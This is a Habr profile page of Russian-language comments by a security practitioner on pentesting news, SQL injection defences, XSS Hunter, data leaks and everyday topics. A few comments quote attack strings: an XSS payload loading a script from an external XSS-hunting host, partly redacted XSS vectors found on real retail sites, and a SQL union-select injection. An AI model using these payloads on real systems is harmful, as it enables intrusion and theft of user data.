Comments / Profile of lukasafonov / Habr

«Яндекс» открыл доступ пользователям к инструменту для управления своими данными и их удаления

33

LukaSafonov June 1, 2021 at 01:11 PM

+2

Сходу получаю ошибку: Превышено количество попыток подтверждения номера телефона. Попробуйте еще раз позже.

Вы пользуетесь уязвимым софтом, но я вам не могу об этом рассказать

93

LukaSafonov April 9, 2021 at 05:11 PM

+1

Скоро на Bug Bounty Ru, пока можете написать на info@bugbounty.ru.

SQL-инъекции' union select null,null,null --

24

LukaSafonov February 16, 2021 at 05:33 PM

0

На уровне базы данных могут не поддерживаются привязанные переменные, поэтому необходимо использовать другие варианты.

Вот примеры с PHP: www.php.net/manual/ru/security.database.sql-injection.php

SQL-инъекции' union select null,null,null --

24

LukaSafonov February 16, 2021 at 04:09 PM

+3

способов предотвращения SQL-инъекций два:
• не использовать динамические запросы к базе;
• не использовать пользовательские данные.

Учите матчасть:
Primary Defenses:
Option 1: Use of Prepared Statements (with Parameterized Queries)
Option 2: Use of Stored Procedures
Option 3: Whitelist Input Validation
Option 4: Escaping All User Supplied Input
Additional Defenses:
Also: Enforcing Least Privilege
Also: Performing Whitelist Input Validation as a Secondary Defense

cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

Что такое Metasploit? Руководство для начинающих

3

LukaSafonov November 18, 2020 at 10:51 PM

0

NOP служат для «обхода» антивирусных средств, но это уже устаревшая техника.

Установка XSS Hunter

1

LukaSafonov November 17, 2020 at 07:41 PM

0

Зачем тогда разворачивать собственный сервис для этой задачи, спросите вы.

0. Чтобы не нарушать NDA и не кидать данные по пентесту направо налево.

Что такое Metasploit? Руководство для начинающих

3

LukaSafonov November 17, 2020 at 07:37 PM

+1

Остановил чтение здесь:

В британском реестре компаний обнаружили XSS

4

LukaSafonov October 29, 2020 at 05:07 AM

+1

При эксплуатации атаки он использовал сервис xsshunter, судя по его пейлоду:

"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT>

Как заряжать макбук

119

LukaSafonov August 21, 2020 at 06:12 PM

+2

Ссылка в посте есть, информация многим может быть полезна, чего-то еще высасывать из пальца нет смысла. Можно было бы обойтись двумя строками текста, но хабр не твиттер.

Как заряжать макбук

119

LukaSafonov August 20, 2020 at 05:17 PM

0

Верхний.

Как заряжать макбук

119

LukaSafonov August 20, 2020 at 03:01 PM

+2

Для версий Mac Book Pro без тачбара с двумя портами слева — зарядку необходимо использовать в верхнем порту.

Как заряжать макбук

119

LukaSafonov August 20, 2020 at 02:35 PM

+3

а мужики-то не знают.

В даркнет утекла база данных проголосовавших по поправкам в Конституцию на 1,1 миллиона записей

24

LukaSafonov August 4, 2020 at 03:08 PM

+13

Такую «базу» можно и нагенерить, она содержит записи типа ХХ ХХ ХХХХХХ. В подарок купившему дают базу ALL CREDIT CARD PIN CODES IN THE WORLD LEAKED.

Обнаружена опаснейшая уязвимость в Windows DNS Server

21

LukaSafonov July 15, 2020 at 01:39 PM

0

Исправил, спасибо!

В сети продают базу с данными 5 млн студентов и сотрудников Skyeng за 40 тысяч рублей

30

LukaSafonov June 27, 2020 at 12:40 PM

+16

Ага, дело не монге, но пароли в «вашей» бд вы храните (хранили в 2019) plaintext’ом. Теперь поинт вызвал доверие?

В сети продают базу с данными 5 млн студентов и сотрудников Skyeng за 40 тысяч рублей

30

LukaSafonov June 27, 2020 at 10:14 AM

+15

Немудрено, учитывая их «отношение» к багхантерам. О багах, приводящих к утечке пользователей в прошлом году сообщили минимум три человека, полученные ответы: дубль, это не продуктовая база и в таком духе. Вот и результат (=.

Консорциум OWASP обновил Web Security Testing Guide

2

LukaSafonov April 24, 2020 at 12:32 PM

0

Сергей, с последней версией 4.1 он стал Web Security Testing Guide.

Kali Linux 2020.1

29

LukaSafonov January 29, 2020 at 01:42 AM

+1

DE — desktop environment. Ошибки поправил. К сожалению переводить/дополнять особо нечем, такими темпами Kali скоро будут раздавать в виде дефолтового Debian/Ubuntu с набором обоев с драконами.

Backport уязвимость в RouterOS ставит под угрозу сотни тысяч устройств

103

LukaSafonov October 29, 2019 at 07:30 PM

0

My bad, fixed :)

Подбор пароля Wi-Fi утилитой aircrack-ng

30

LukaSafonov August 21, 2019 at 11:58 AM

+10

Сейчас точно 2019 год?

«Мамкины хакеры» на официальной работе: чем занимаются пентестеры

34

LukaSafonov July 13, 2019 at 02:11 PM

+4

Распедалил по-взрослому. Респект, Сергей!

Авторы GandCrab прекращают работу: они уверяют, что украли достаточно

183

LukaSafonov June 3, 2019 at 04:04 PM

+3

Авторы GandCrab прекращают работу: они уверяют, что украли достаточно

183

LukaSafonov June 3, 2019 at 03:29 PM

+9

<sarcasm>Это забота</sarcasm>

Яндекс не считает Tabnabbing уязвимостью

25

LukaSafonov May 23, 2019 at 04:14 PM

+1

Хороший пример такой уязвимости.

Что-что случится 1 февраля 2020 года?

6

LukaSafonov May 22, 2019 at 12:27 AM

+7

2020 год это так далеко… Падажжи, как это сейчас 2019?!

Tenable обновила свой бесплатный инструмент для анализа уязвимостей

3

LukaSafonov May 20, 2019 at 01:50 PM

0

Зря иронизируете, полезный инструмент.

Слепая простота

7

LukaSafonov May 15, 2019 at 05:08 PM

+4

2019 год:

посещаемость сайта > 3.000.000 ежемесячно

/login?redirect=%250ajavascript:alert(1);

крупный ритейл:

/no-*****-******?q=%27%22%20autofocus=true%20onfocus=%22alert(document.domain) >

крупный онлайн магазин:

*********_center/********/******.php?SECTION_ID=******}});};top[%22eval%22](top[%22atob%22](%27************%27));function%20load*******()%20{$.ajax({%20type:%20%27get%27,%20url:%20%27/*******_center/*****/****.php%27,test:{//

Слепая простота

7

LukaSafonov May 15, 2019 at 11:56 AM

+4

Любая атака, принесшая результат эффективна. Эта статья именно о blind XSS. Что касается отраженных XSS — тут тоже много интересных векторов, например отрисовка формы фишинга.

В ответ на кибератаку Израиль нанёс авиаудар

206

LukaSafonov May 6, 2019 at 06:15 PM

0

Окружить на вражеской территории?

В ответ на кибератаку Израиль нанёс авиаудар

206

LukaSafonov May 6, 2019 at 05:50 PM

+14

Каюсь, это был небольшой сарказм. Думаю большинство читателей поняли правильно.

В ответ на кибератаку Израиль нанёс авиаудар

206

LukaSafonov May 6, 2019 at 05:48 PM

–5

Это новость, а не статья. Подробности можно прочитать в твиттере ЦАХАЛ, скриншот которого есть в тексте — twitter.com/IDF.

Crew Dragon взорвался

305

LukaSafonov April 21, 2019 at 07:18 PM

+29

Не стоит вскрывать эту тему.

Новый уровень безопасности МФУ: imageRUNNER ADVANCE III

12

LukaSafonov April 17, 2019 at 02:23 PM

+1

Любой нормальный администратор заблочит доступ в интернет для принтера.

если бы все так делали — пентестеры давно бы остались без работы. К сожалению, мой опыт говорит об обратном.

На Хабре открылся новостной раздел. Раскладываем всё по полкам

113

LukaSafonov March 27, 2019 at 06:29 PM

+13

Почему эта новость не в новостях?

Распутывание клубка уязвимостей на сайтах

19

LukaSafonov March 27, 2019 at 02:04 PM

+1

и сольет багу =)

Распутывание клубка уязвимостей на сайтах

19

LukaSafonov March 25, 2019 at 12:14 AM

+3

Слабоумие_и_отвага.jpg

Распутывание клубка уязвимостей на сайтах

19

LukaSafonov March 25, 2019 at 12:06 AM

+3

Вы путаете offensive и defensive. Издевательства над ИБшниками в компаниях, Вы серьезно?

Вы либо фантазируете, либо прилетели к нам из параллельной вселенной.

Распутывание клубка уязвимостей на сайтах

19

LukaSafonov March 24, 2019 at 11:26 PM

+8

Если кого-то эта статья вдохновит на поиски уязвимостей без разрешения владельцев ресурса и вымогательство вознаграждения — советую ознакомиться со статьями 272 и 163.

Утечка данных (которая могла произойти, но не произошла) из телемедицинской компании

17

LukaSafonov March 21, 2019 at 09:46 AM

+1

Это скорее не утечка, как в первом случае, это уязвимость IDOR.

В России предлагают легализовать встроенные сим-карты

23

LukaSafonov March 18, 2019 at 09:41 PM

0

Переадресация поможет принять звонки в походе.